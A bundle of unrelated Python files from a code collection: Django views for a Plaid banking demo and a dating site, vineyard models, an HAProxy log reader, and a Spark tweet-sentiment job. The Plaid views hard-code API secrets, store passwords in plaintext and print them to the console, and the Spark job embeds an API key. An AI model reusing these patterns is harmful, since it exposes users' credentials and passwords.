downgrade():\n op.drop_column('stardrive_user', 'role')\n op.execute(\"DROP TYPE role;\")\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('stardrive_user', sa.Column('role', sa.VARCHAR(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","sub_path":"backend/migrations/versions/2fd0ab60fe3a_.py","file_name":"2fd0ab60fe3a_.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"361785560","text":"from django.http import HttpResponse\nfrom .models import Users\nfrom django.template import loader\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views import generic\nfrom django.http import Http404\nimport requests\nimport json\n\ndef index(request):\n\tall_users = Users.objects.all()\n\ttemplate = loader.get_template('users/index.html')\n\tcontext = {\n\t\tall_users : 'all_users',\n\t}\n\treturn HttpResponse(template.render(context, request))\n\ndef login(request):\n\ttemplate = loader.get_template('users/login.html')\n\tlogin_message = 'Enter your credentials to login into the system'\n\tcontext = {\n\t\t'login_message': login_message,\n\t}\n\treturn HttpResponse(template.render(context, request))\n\ndef account_profile(request, user_id):\n\n\treturn HttpResponse(\"

    User profile for user: \" + str(user_id) + \"

    \" )\n\ndef logout(request):\n\treturn HttpResponse(\"

    You are logged out

    \")\n\ndef getTransactionData(access_tkn):\n\turl = \"https://sandbox.plaid.com/transactions/get\"\n\n\tpayload = {\n\t\t\"client_id\":\"5da9e9d3470e370016651aa3\",\n\t\t\"secret\":\"1026c23bcd23fccd4f9dabb1f9f172\",\n\t\t\"access_token\": access_tkn,\n\t\t\"start_date\":\"2017-10-25\",\n\t\t\"end_date\":\"2019-10-25\"\n\t}\n\n\tdata = json.dumps(payload)\n\n\theaders = {\n 'Content-Type': \"application/json\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"bec1a651-a9e8-4771-9b6e-bf668f000232\"\n }\n\n\trawResponse = requests.request(\"POST\", url, data=data, headers=headers)\n\tresponse = json.loads(rawResponse.text)\n\tprettyResponse = json.dumps(response, indent=4, sort_keys=True)\n\n\treturn prettyResponse\n\ndef getAccountData(access_tkn):\n\trawTransactionData = getTransactionData(access_tkn)\n\ttransactionData = json.loads(rawTransactionData)\n\taccountData = transactionData['accounts']\n\tprint(accountData)\n\treturn accountData\n\ndef validate(request):\n\ttemplate = loader.get_template('users/login.html')\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\tprint(username)\n\tprint(password)\n\ttry:\n\t\tuser = Users.objects.get(username=username, password=password)\n\t\tprint(\"is valid\",user.is_logged_in)\n\t\tuser.is_logged_in = True\n\t\tuser.save()\n\n\t\tlogin_message = \"Sucessfully logged in\"\n\n\t\taccess_tkn = user.access_tkn\n\n\t\trequest.session['access_tkn']=access_tkn\n\t\tcontext = {\n\t\t\t'user': user,\n\t\t\t'login_message': login_message\n\t\t}\n\n\t\ttemplate = loader.get_template('users/account_profile.html')\n\texcept:\n\t\tlogin_message = \"Incorrect Credentials. Please Try Again....\"\t\t\n\t\tcontext = {\n\t\t\t'user': None,\n\t\t\t'login_message': login_message\n\t\t}\n\t\treturn HttpResponse(template.render(context,request))\n\n\tusername=None\n\tpassword=None\n\taccess_tkn=None\n\ttransactionData=None\n\treturn HttpResponse(template.render(context, request))\n\n\ndef invalidate(request):\n\trequest.session['access_tkn'] = None\n\ttemplate = loader.get_template('users/login.html')\n\tuser_id = request.POST['user_id']\n\tcontext = {}\n\ttry:\n\t\tuser = Users.objects.get(pk=user_id)\n\t\tuser.is_logged_in =False\n\t\tuser.save()\n\texcept:\n\t\tprint('')\n\tuser_id = None\n\treturn HttpResponse(template.render(context, request))\n\ndef signup(request):\n\ttemplate = loader.get_template('users/signup.html')\n\tcontext = {}\n\treturn HttpResponse(template.render(context, request))\n\ndef getPublicToken():\n\turl = \"https://sandbox.plaid.com/sandbox/public_token/create\"\n\tpayload = {\n\t\t\"public_key\":\"91e20631f435dd6896adf30031b81c\",\n\t\t\"institution_id\":\"ins_3\",\n\t\t\"initial_products\":[\"transactions\"],\n\t\t\"options\":{\n\t\t\t\"webhook\":\"https://webhook.site/82e5cebe-b8d0-4178-ac51-bb3699d782ac\"\n\t\t}\n\t}\n\tdata = json.dumps(payload)\n\theaders = {\n\t 'Content-Type': \"application/json\",\n\t 'cache-control': \"no-cache\",\n\t 'Postman-Token': \"02fad5e9-5a06-4d80-b35e-db22559238e9\"\n\t }\n\trawResponse = requests.request(\"POST\", url, data=data, headers=headers)\n\tresponse = json.loads(rawResponse.text)\n\tpublic_token = response['public_token']\n\treturn public_token\n\ndef exchangeToken(public_token):\n\turl = \"https://sandbox.plaid.com/item/public_token/exchange\"\n\n\tpayload = {\n\t\t\"client_id\":\"5da9e9d3470e370016651aa3\",\n\t\t\"secret\":\"1026c23bcd23fccd4f9dabb1f9f172\",\n\t\t\"public_token\":public_token\n\t}\n\n\tdata = json.dumps(payload)\n\n\theaders = {\n\t 'Content-Type': \"application/json\",\n\t 'cache-control': \"no-cache\",\n\t 'Postman-Token': \"278806c6-0301-49d7-933d-f3c7b295e6a4\"\n\t}\n\n\trawResponse = requests.request(\"POST\", url, data=data, headers=headers)\n\tresponse = json.loads(rawResponse.text)\n\taccess_tkn = response['access_token']\n\titem_id = response['item_id']\n\n\treturn access_tkn,item_id\n\ndef register(request):\n\tall_users = Users.objects.all()\n\ttemplate = loader.get_template('users/login.html')\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\temail = request.POST['email_id']\n\n\tpublic_token = getPublicToken()\n\tprint(\"Successfully Generated Public Token for user \",username,\" \",public_token)\n\taccess_tkn,item_id = exchangeToken(public_token)\n\n\tuser = Users.objects.create(username=username,password=password,email=email,access_tkn=access_tkn,item_id=item_id)\n\tuser.save()\n\n\tcontext = {\n\t\tall_users : 'all_users',\n\t}\n\treturn HttpResponse(template.render(context, request))\n\ndef getTransactions(request):\n\ttemplate = loader.get_template('users/account_profile.html')\n\tuser_id = request.POST['user_id']\n\taccess_tkn = request.session['access_tkn']\n\tcontext = dict()\n\tif access_tkn:\n\t\ttry:\n\t\t\tuser = Users.objects.get(pk=user_id)\n\t\t\ttransactionData = getTransactionData(access_tkn)\n\t\t\tcontext = {\t\n\t\t\t\t'user':user,\n\t\t\t\t'transactionData':transactionData,\n\t\t\t\t'response_message':'Successfully Reloaded Transaction Data'\n\t\t\t} \n\t\texcept:\n\t\t\ttemplate = loader.get_template('users/login.html')\n\t\t\n\t\n\telse:\n\t\ttemplate = loader.get_template('users/login.html')\n\t\n\treturn HttpResponse(template.render(context, request))\n\ndef getAccounts(request):\n\ttemplate = loader.get_template('users/account_profile.html')\n\tuser_id = request.POST['user_id']\n\taccess_tkn = request.session['access_tkn']\n\tcontext = dict()\n\ttry:\n\t\tuser = Users.objects.get(pk=user_id)\n\t\taccountData = getAccountData(access_tkn)\n\t\tcontext = {\t\n\t\t\t'user':user,\n\t\t\t'accountData':accountData,\n\t\t\t'response_message':'Successfully Reloaded Account Data'\n\t\t} \n\texcept:\n\t\tprint(\"Redirecting\")\n\t\ttemplate = loader.get_template('users/login.html')\n\t\n\treturn HttpResponse(template.render(context, request))","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"362826347","text":"#!/usr/local/bin/python\n\n#\n# Copyright 2020, Fernando Lemes da Silva\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport time\nimport re\nfrom os import listdir, remove\nfrom os.path import isfile, join\nfrom pymongo import MongoClient\n\nhaproxy_log_format = re.compile(r\"^.* ([0-9]+)/([0-9]+)/([0-9]+)/([0-9]+)/([0-9]+) ([0-9]+) ([0-9]+) [^ ]+ [^ ]+ [^ ]+ ([0-9]+)/([0-9]+)/([0-9]+)/([0-9]+)/([0-9]+) ([0-9]+)/([0-9]+) \\\"([A-Z]+) ([^ ]+) ([^ ]+)\\\".*$\")\n\nmongo_client = MongoClient('mongodb://mongodb:27017/')\nmongo_database = mongo_client.monitoring\nmongo_collection = mongo_database.log_records\n\ndef add_haproxy_entry_to_db(data):\n log_entry = {\n \"time_to_receive_request\": data[0],\n \"time_in_queue\": data[1],\n \"time_to_tcp_connect\": data[2],\n \"time_to_get_response\": data[3],\n \"total_time_active\": data[4],\n \"http_status\": data[5],\n \"bytes_count\": data[6],\n \"concurrent_connections_haproxy\": data[7],\n \"concurrent_connections_frontend\": data[8],\n \"concurrent_connections_backend\": data[9],\n \"concurrent_active_connections_on_server\": data[10],\n \"connection_retry_attempts\": data[11],\n \"queue1\": data[12],\n \"queue2\": data[13],\n \"http_verb\": data[14],\n \"http_path\": data[15],\n \"http_protocol\": data[16]\n }\n mongo_collection.insert_one(log_entry)\n\ndef process_file_line(line):\n search = haproxy_log_format.search(line)\n if search:\n add_haproxy_entry_to_db(search.groups())\n\nlog_path = \"/logs/\"\n\nwhile True:\n file_list = [join(log_path, each_dir_entry) for each_dir_entry in listdir(log_path) if isfile(join(log_path, each_dir_entry))]\n for each_file in file_list:\n print(\"Processing file: \" + each_file)\n lines_processed = 0\n file_handler = open(each_file, \"r\")\n for each_line in file_handler:\n process_file_line(each_line)\n lines_processed += 1\n file_handler.close()\n print(\"Processed \" + str(lines_processed) + \" lines from file: \" + each_file)\n remove(each_file)\n time.sleep(5)\n","sub_path":"log-reader/readlogs.py","file_name":"readlogs.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650597452","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom django.shortcuts import render,redirect,render_to_response\nfrom django.contrib.auth import authenticate, login\nfrom .forms import LoginForm,UserRegistrationForm,UserEditForm, ProfileEditForm,UserFeatureEditForm\nfrom .models import Profile\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.contrib.auth import REDIRECT_FIELD_NAME\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib import messages\nfrom django.http import Http404, HttpResponseRedirect\nfrom django.views.generic import DeleteView, TemplateView\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.decorators import login_required\nfrom search.models import userfeature,hobbies,movie,music\nfrom dating.helper import getgender,geteducation,getlocation,getonlychild\n\n# DEFAULT_RETURNTO_PATH = getattr(settings, 'DEFAULT_RETURNTO_PATH', '/')\n\n\n\ndef user_login(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n user = authenticate(username=cd['username'],\n password=cd['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponse('Authenticated successfully')\n else:\n return HttpResponse('Disabled account')\n else:\n return HttpResponse('Invalid login')\n else:\n form = LoginForm()\n return render(request, 'login.html', {'form': form})\n\n\n\n@login_required\ndef dashboard(request):\n return render(request, 'account/dashboard.html', {'section': 'dashboard'})\n\n\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # Create a new user object but avoid saving it yet\n new_user = user_form.save(commit=False)\n # Set the chosen password\n new_user.set_password(\n user_form.cleaned_data['password'])\n # Save the User object\n new_user.save()\n # Create the user profile\n profile = Profile.objects.create(user=new_user)\n return render(request,\n 'account/register_done.html',\n {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n return render(request,\n 'account/register.html',\n {'user_form': user_form})\n\ndef viewprofile(request,pk=None):\n if pk :\n profile = Profile.objects.get(pk=pk)\n\n else:\n if request.user.is_authenticated:\n profile = Profile.objects.get(user=request.user)\n\n username = profile.user.username\n user = profile.user\n G = getgender(profile.gender)\n EDU = geteducation(profile.education)\n L= getlocation(profile.location)\n OC = getonlychild(profile.only_child)\n if profile.user.id % 10 != 0:\n if profile.gender == \"M\":\n l4 = \"Woman\"\n else:\n l4 = \"Man\"\n else:\n if profile.gender == \"M\":\n l4 = \"Man\"\n else:\n l4 = \"Woman\"\n\n if profile.intro == \"\":\n if profile.gender == \"M\":\n intro = \"He haven't write anything yet. ╥﹏╥\"\n elif profile.gender == \"F\":\n intro = \"She haven't write anything yet. ╥﹏╥\"\n else:\n intro = \"He/She haven't write anything yet. ╥﹏╥\"\n else:\n intro = profile.intro\n\n ufeature = userfeature.objects.get(user = request.user)\n lmusic = ufeature.musicloved.all()\n hmusic = ufeature.musichated.all()\n lmovie = ufeature.movieloved.all()\n hmovie = ufeature.moviehated.all()\n hobbies = ufeature.hobbies.all()\n\n\n\n\n\n data = {'profile':profile,'pk':pk,'username':username,'G':G,'EDU':EDU,\"L\":L,\"onlychild\":OC,\"l4\":l4,\"intro\":intro}\n\n data[\"ufeature\"] = ufeature\n data[\"lmusic\"] = lmusic\n data[\"hmusic\"] =hmusic\n data[\"lmovie\"] = lmovie\n data[\"hobbies\"] = hobbies\n\n\n # user_feature = userfeature.objects.get(user=profile.user)\n return render(request,'account/profile.html', data)\n\n\n\n\ndef viewprofilewithname(request,username=None):\n if username:\n user = User.objects.get(username=username)\n # user_feature = userfeature.objects.get(user=user)\n profile = Profile.objects.get(user=user)\n\n else:\n if request.user.is_authenticated:\n profile = Profile.objects.get(user=request.user)\n # user_feature = userfeature.objects.get(user=request.user)\n\n pk = profile.pk\n\n G = getgender(profile.gender)\n EDU = geteducation(profile.education)\n L= getlocation(profile.location)\n OC = getonlychild(profile.only_child)\n if profile.user.id % 10 != 0:\n if profile.gender == \"M\":\n l4 = \"Woman\"\n else:\n l4 = \"Man\"\n else:\n if profile.gender == \"M\":\n l4 = \"Man\"\n else:\n l4 = \"Woman\"\n\n if profile.intro == \"\":\n if profile.gender == \"M\":\n intro = \"He haven't write anything yet. ╥﹏╥\"\n elif profile.gender == \"F\":\n intro = \"She haven't write anything yet. ╥﹏╥\"\n else:\n intro = \"He/She haven't write anything yet. ╥﹏╥\"\n else:\n intro = profile.intro\n\n ufeature = userfeature.objects.get(user = request.user)\n lmusic = ufeature.musicloved.all()\n hmusic = ufeature.musichated.all()\n lmovie = ufeature.movieloved.all()\n hmovie = ufeature.moviehated.all()\n hobbies = ufeature.hobbies.all()\n\n\n\n\n\n data = {'profile':profile,'pk':pk,'username':username,'G':G,'EDU':EDU,\"L\":L,\"onlychild\":OC,\"l4\":l4,\"intro\":intro}\n\n data[\"ufeature\"] = ufeature\n data[\"lmusic\"] = lmusic\n data[\"hmusic\"] =hmusic\n data[\"lmovie\"] = lmovie\n data[\"hobbies\"] = hobbies\n\n return render(request,'account/profile.html', data)\n# def viewprofile(request,username=None):\n# ctx = {'username':username}\n# if request.method == 'POST':\n# if username:\n# profile = Profile.objects.get(username=username)\n# else:\n# if request.user.is_authenticated:\n# profile = Profile.objects.get(user=request.user)\n#\n# return render(request,'account/profile.html', {'profile':profile},ctx)\n\n\n@login_required\ndef edit(request):\n\n profile = Profile.objects.get(user=request.user)\n user_feature = userfeature.objects.get(user=request.user)\n lmusic = user_feature.musicloved.all()\n hmusic = user_feature.musichated.all()\n lmovie = user_feature.movieloved.all()\n hmovie = user_feature.moviehated.all()\n lhobbies = user_feature.hobbies.all()\n\n\n if request.method == 'POST':\n user_form = UserEditForm(instance=request.user,\n data=request.POST)\n profile_form = ProfileEditForm(instance = profile,\n data=request.POST,\n files=request.FILES)\n\n userfeature_form =UserFeatureEditForm(instance = user_feature,\n data=request.POST,\n files=request.FILES)\n if user_form.is_valid():\n user_form.save()\n else:\n messages.error(request, 'Error updating your profile')\n\n if profile_form.is_valid():\n profile_form.save()\n else:\n messages.error(request, 'Error updating your profile')\n\n if userfeature_form.is_valid():\n userfeature_form.save()\n else:\n messages.error(request, 'Error updating your profile')\n\n\n messages.success(request, 'Profile updated '\\\n 'successfully')\n\n else:\n user_form = UserEditForm(instance=request.user)\n profile_form = ProfileEditForm(instance=profile)\n userfeature_form =UserFeatureEditForm(instance = user_feature)\n\n data = {'user_form': user_form,'profile_form': profile_form,'userfeature_form':userfeature_form,'profile':profile,\"ufeature\":user_feature}\n\n data[\"lmusic\"] = lmusic\n data[\"hmusic\"] =hmusic\n data[\"lmovie\"] = lmovie\n data[\"lhobbies\"] = lhobbies\n\n data[\"music\"] = music.objects.all()\n data[\"movie\"] = movie.objects.all()\n data[\"hobbies\"] = hobbies.objects.all()\n\n return render(request,\n 'account/edit.html',\n data)\n\ndef index(request):\n data ={}\n data['profile']= Profile.objects.all().reverse()[:10]\n return render(request, 'index-2.html',data)\n","sub_path":"dating/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491189043","text":"from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom binascii import b2a_hex\nfrom os import urandom\n\ndef build_uid():\n return unicode('vineyard' + b2a_hex(urandom(5)))\n\nclass Vineyard(models.Model):\n user = models.ForeignKey(User)\n vineyard_id = models.CharField(max_length=20, editable=False,\n default=build_uid)\n name = models.CharField(max_length=500, blank=True)\n owner = models.CharField(max_length=500, blank=True)\n street = models.CharField(max_length=1000, blank=True)\n county = models.CharField(max_length=100, blank=True)\n zipcode = models.IntegerField(blank=True, null=True)\n email = models.EmailField(max_length=200, blank=True)\n phone = models.CharField(max_length=12, blank=True)\n description = models.TextField(max_length=350, blank=True)\n established = models.DateField(blank=True, null=True)\n website = models.URLField(max_length=300, blank=True)\n latitude = models.DecimalField(max_digits=10,\n decimal_places=7, blank=True, null=True)\n longitude = models.DecimalField(max_digits=10,\n decimal_places=7, blank=True, null=True)\n sunday_open = models.TimeField(blank=True, null=True)\n sunday_close = models.TimeField(blank=True, null=True)\n monday_open = models.TimeField(blank=True, null=True)\n monday_close = models.TimeField(blank=True, null=True)\n tuesday_open = models.TimeField(blank=True, null=True)\n tuesday_close = models.TimeField(blank=True, null=True)\n wednesday_open = models.TimeField(blank=True, null=True)\n wednesday_close = models.TimeField(blank=True, null=True)\n thursday_open = models.TimeField(blank=True, null=True)\n thursday_close = models.TimeField(blank=True, null=True)\n friday_open = models.TimeField(blank=True, null=True)\n friday_close = models.TimeField(blank=True, null=True)\n saturday_open = models.TimeField(blank=True, null=True)\n saturday_close = models.TimeField(blank=True, null=True)\n vineyard = models.BooleanField(default=False)\n tasting_room = models.BooleanField(default=False)\n winery = models.BooleanField(default=False)\n image = models.ImageField(upload_to=settings.MEDIA_ROOT,\n height_field=None, width_field=None, max_length=1000,\n blank=True, null=True)\n\n def vineyards_serialized(self, model=None):\n if model is None:\n model = self\n json = {\n 'name': model.name,\n 'owner': model.owner,\n 'address' : {\n 'street': model.street,\n 'county': model.county,\n 'zipcode': model.zipcode,\n },\n 'email': model.email,\n 'phone': model.phone,\n 'description': model.description,\n 'established': model.established,\n 'website': model.website,\n 'geo': {\n 'lat': model.latitude,\n 'lng': model.longitude,\n },\n 'hours': {\n 'sunday': {'open': model.sunday_open,\n 'close': model.sunday_open},\n 'monday': {'open': model.monday_open,\n 'close': model.monday_open},\n 'tuesday': {'open': model.tuesday_open,\n 'close': model.tuesday_open},\n 'wednesday': {'open': model.wednesday_open,\n 'close': model.wednesday_open},\n 'thursday': {'open': model.thursday_open,\n 'close': model.thursday_open},\n 'friday': {'open': model.friday_open,\n 'close': model.friday_open},\n 'saturday': {'open': model.saturday_open,\n 'close': model.saturday_open},\n },\n 'type': {\n 'vineyard': model.vineyard,\n 'tasting_room': model.tasting_room,\n 'winery': model.winery\n },\n# 'image': model.image,\n 'services': model.get_services(model.pk),\n 'products': model.get_products(model.pk),\n }\n return json\n\n def get_services(self, id):\n try:\n service_list = []\n services = Service.objects.filter(product_id=id)\n for s in services:\n select = {\n 'service': s.service,\n 'description': s.description\n }\n service_list.append(select)\n return service_list\n except:\n return 'undefined'\n\n def get_products(self, id):\n try:\n product_list = []\n products = Product.objects.filter(product_id=id)\n for p in products:\n select = {\n 'product': p.product,\n 'description': p.description\n }\n product_list.append(select)\n return product_list\n except:\n return 'undefined'\n\nclass Service(models.Model):\n vineyard_fk = models.ForeignKey(Vineyard)\n service = models.CharField(max_length=500, blank=True)\n description= models.TextField(blank=True)\n\nclass Product(models.Model):\n vineyard_fk = models.ForeignKey(Vineyard)\n product = models.CharField(max_length=100, blank=True)\n description = models.TextField(max_length=100, blank=True)\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n\n def __unicode__(self):\n return self.user.username","sub_path":"azwine/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653329486","text":"from pyspark import SparkConf, SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import *\nimport requests as re\nimport statistics as stats\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"action\", choices=['console', 'topic'])\nargs = parser.parse_args()\n\n\n# ------ HELPER FUNCTIONS -------\n\n\ndef get_content(tweet):\n \"\"\"\n Extract the company out of the tweet\n \"\"\"\n\n tesla = [\"Tesla\", \"tesla\", \"tsla\", \"TSLA\", \"#tsla\", \"#TSLA\"]\n apple = [\"Apple\", \"apple\", \"aapl\", \"AAPL\", \"#aapl\", \"#AAPL\"]\n google = [\"Google\", \"google\", \"googl\", \"GOOGL\", \"#googl\", \"#GOOGL\"]\n bayer = [\"Bayer\", \"bayer\", \"bayn\", \"BAYN\", \"#bayn\", \"#BAYN\"]\n bitcoin = [\"Bitcoin\", \"bitcoin\"]\n \n if any(map(tweet.__contains__, tesla)):\n return \"tesla\"\n elif any(map(tweet.__contains__, apple)):\n return \"apple\"\n elif any(map(tweet.__contains__, google)):\n return \"google\"\n elif any(map(tweet.__contains__, bayer)):\n return \"bayer\"\n elif any(map(tweet.__contains__, bitcoin)):\n return \"bitcoin\"\n else:\n return \"-\"\n \n\n# Create UDF\nget_content_udf = udf(get_content, StringType())\n\n\ndef get_sentiment(tweet):\n \"\"\"\n Helper function that extracts the sentiment of each tweet\n 1 = positive\n 0 = negative \n \"\"\"\n\n # Do the API request (Stanford Sentiment)\n r = re.post(\n \"https://api.deepai.org/api/sentiment-analysis\",\n data={\n 'text': tweet,\n },\n headers={'api-key': 'ca26882d-52af-4903-b0f7-571801ebd67a'}\n )\n\n # Get only the output array. Each sentence has its own sentiments\n result = r.json()[\"output\"]\n\n # Map strings to integers helper function\n def classify(sentiment):\n sentiment = sentiment.lower()\n if sentiment == \"verynegative\":\n return -2\n elif sentiment == \"negative\":\n return -1\n elif sentiment == \"positive\":\n return 1\n elif sentiment == \"verypositive\":\n return 2\n else:\n return 0\n\n # Map strings to integers helper function\n result = list( map(classify, result))\n\n # Calculate the entire\n result = stats.mean(result)\n \n return 1 if result >= 0 else 0\n\n# Create UDF\nget_sentiment_udf = udf(get_sentiment, StringType())\n\n\n# ------ SPARK PROCESS -------\n\nspark = SparkSession.builder\\\n .appName('Tweet Sentiment Analysis: Influencers')\\\n .getOrCreate()\n\nspark.sparkContext.setLogLevel(\"ERROR\")\n\n# Create the schema for input data\nschema = StructType([ \\\n StructField(\"text\", StringType(), True),\n StructField(\"created_at\", StringType(), True) \\\n ])\n\n# Get the stream\nraw_input = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\", \"twitterPublic\") \\\n .option(\"startingOffsets\", \"latest\") \\\n .option(\"failOnDataLoss\", \"false\") \\\n .load()\n\n# Transform byte code to string\nraw_input = raw_input.selectExpr(\"CAST(value AS STRING)\")\n\n# Check if the stream is running\nprint(\"Are we streaming? \" + str(raw_input.isStreaming))\n\n# print schema of the raw input\nprint(\"Data Schema: raw_input\")\nraw_input.printSchema()\n\n# Transform value information to a column\ntweets = raw_input.select(from_json(raw_input.value, schema).alias(\"tweet\"))\n\n#Select only the text and insert process time\ntweets = tweets.select(col(\"tweet.text\").alias(\"tweet\"),).withColumn(\"process_time\", current_timestamp())\n\n# print schema of the new structured stream\nprint(\"Data Schema tweets:\")\ntweets.printSchema()\n\n# Extract the content of the tweet\ntweets = tweets.withColumn(\"company\", get_content_udf(col(\"tweet\")))\n\n# Filter not interesting tweets\ntweets = tweets.filter(~(tweets.company == \"-\"))\n\n# ADD SENTIMENT\n# Positive\ntweets = tweets.withColumn(\"sentiment_positive\",get_sentiment_udf(col(\"tweet\")))\n# Add additional negative for easier count\ntweets = tweets.withColumn(\"sentiment_negative\", 1 - col(\"sentiment_positive\"))\n\n\n# Specify windowing\nwindow_length = \"10 seconds\"\n# sliding_interval = \"0 seconds\"\n\n# Aggreagte tweets\ntweets_aggregated = tweets \\\n .withWatermark(\"process_time\", window_length).groupBy(\n window(tweets.process_time, window_length),\n tweets.company\n ).agg( \\\n sum(\"sentiment_positive\").alias(\"sentiment_positive\"),\n sum(\"sentiment_negative\").alias(\"sentiment_negative\"),\n count(lit(1)).alias(\"tweet_count\")\n )\n\n# Create fraction for sentiments and add timestamp\ntweets_aggregated = tweets_aggregated.withColumn(\"sentiment_positive\", col(\"sentiment_positive\") / col(\"tweet_count\")) \\\n .withColumn(\"sentiment_negative\", col(\"sentiment_negative\") / col(\"tweet_count\")) \\\n .withColumn(\"time\", current_timestamp())\n\n\n# Define output\ntweets_aggregated = tweets_aggregated.select( \\\n col(\"company\"),\n col(\"sentiment_positive\"),\n col(\"sentiment_negative\"),\n col(\"tweet_count\"),\n col(\"time\")\n)\n\n# Start running the query that prints the running counts to the console\n# use append for non aggregated data\n# use complete for aggregation\n# used update for only last aggregate\n\nif args.action == \"console\":\n output = tweets_aggregated \\\n .writeStream \\\n .outputMode(\"update\") \\\n .format(\"console\") \\\n .start()\n\nelif args.action == \"topic\": \n output = tweets_aggregated \\\n .selectExpr(\"to_json(struct(*)) AS value\") \\\n .writeStream \\\n .outputMode(\"update\") \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"topic\", \"twitterPublicOutput\") \\\n .option(\"checkpointLocation\", \"/tmp/steffen/checkpoint\") \\\n .start()\n\n\n\noutput.awaitTermination()\n\n\n# spark-submit --packages org.apache.spark:spark-sql-kafka-0-10_2.12:3.1.1 spark_public_opinion.py console","sub_path":"spark_public_opinion.py","file_name":"spark_public_opinion.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32680432","text":"from random import choice\nfrom shapeworld import util\nfrom shapeworld.captions import Quantifier\nfrom shapeworld.captioners import WorldCaptioner\n\n\nclass QuantifierCaptioner(WorldCaptioner):\n\n # incorrect modes\n # 0: correct\n # 1: incorrect restrictor\n # 2: incorrect body\n # 3: incorrect quantifier\n\n zero_quantifiers = {('count', 'lt', 0), ('count', 'leq', 0), ('count', 'eq', 0), ('count', 'eq-all', 0), ('count', 'lt', 1), ('ratio', 'lt', 0.0), ('ratio', 'leq', 0.0), ('ratio', 'eq', 0.0)}\n\n def __init__(self, restrictor_captioner, body_captioner, quantifiers=None, incorrect_distribution=None, pragmatical_redundancy_rate=None, pragmatical_tautology_rate=None, logical_redundancy_rate=None, logical_tautology_rate=None, logical_contradiction_rate=None):\n super(QuantifierCaptioner, self).__init__(\n internal_captioners=(restrictor_captioner, body_captioner),\n pragmatical_redundancy_rate=pragmatical_redundancy_rate,\n pragmatical_tautology_rate=pragmatical_tautology_rate,\n logical_redundancy_rate=logical_redundancy_rate,\n logical_tautology_rate=logical_tautology_rate,\n logical_contradiction_rate=logical_contradiction_rate\n )\n\n self.restrictor_captioner = restrictor_captioner\n self.body_captioner = body_captioner\n self.quantifiers = quantifiers\n self.incorrect_distribution = util.cumulative_distribution(util.value_or_default(incorrect_distribution, [1, 1, 2]))\n\n def set_realizer(self, realizer):\n if not super(QuantifierCaptioner, self).set_realizer(realizer):\n return False\n\n if self.quantifiers is None:\n self.quantifiers = [(qtype, qrange, quantity) for qtype, qranges in realizer.quantifiers.items() for qrange, quantities in qranges.items() for quantity in quantities]\n else:\n self.quantifiers = [(qtype, qrange, quantity) for qtype, qranges in realizer.quantifiers.items() if qtype in self.quantifiers for qrange, quantities in qranges.items() for quantity in quantities]\n\n return True\n\n def rpn_length(self):\n return self.restrictor_captioner.rpn_length() + self.body_captioner.rpn_length() + 1\n\n def rpn_symbols(self):\n return super(QuantifierCaptioner, self).rpn_symbols() | {'{}-{}-{}-{}'.format(Quantifier.__name__, *quantifier) for quantifier in self.quantifiers}\n\n def sample_values(self, mode, correct, predication):\n assert predication.empty()\n\n if not super(QuantifierCaptioner, self).sample_values(mode=mode, correct=correct, predication=predication):\n return False\n\n self.incorrect_mode = 0 if correct else 1 + util.sample(self.incorrect_distribution)\n\n self.qtype, self.qrange, self.quantity = choice(self.quantifiers)\n\n predication = predication.copy()\n\n if not self.restrictor_captioner.sample_values(mode=mode, correct=(self.incorrect_mode != 1), predication=predication): # 1: incorrect restrictor\n return False\n\n if (self.qtype, self.qrange, self.quantity) in QuantifierCaptioner.zero_quantifiers:\n # always incorrect body for zero quantification, since we need an incorrect body for a correct caption\n if not self.body_captioner.sample_values(mode=mode, correct=False, predication=predication): # 2: incorrect body\n return False\n\n else:\n if not 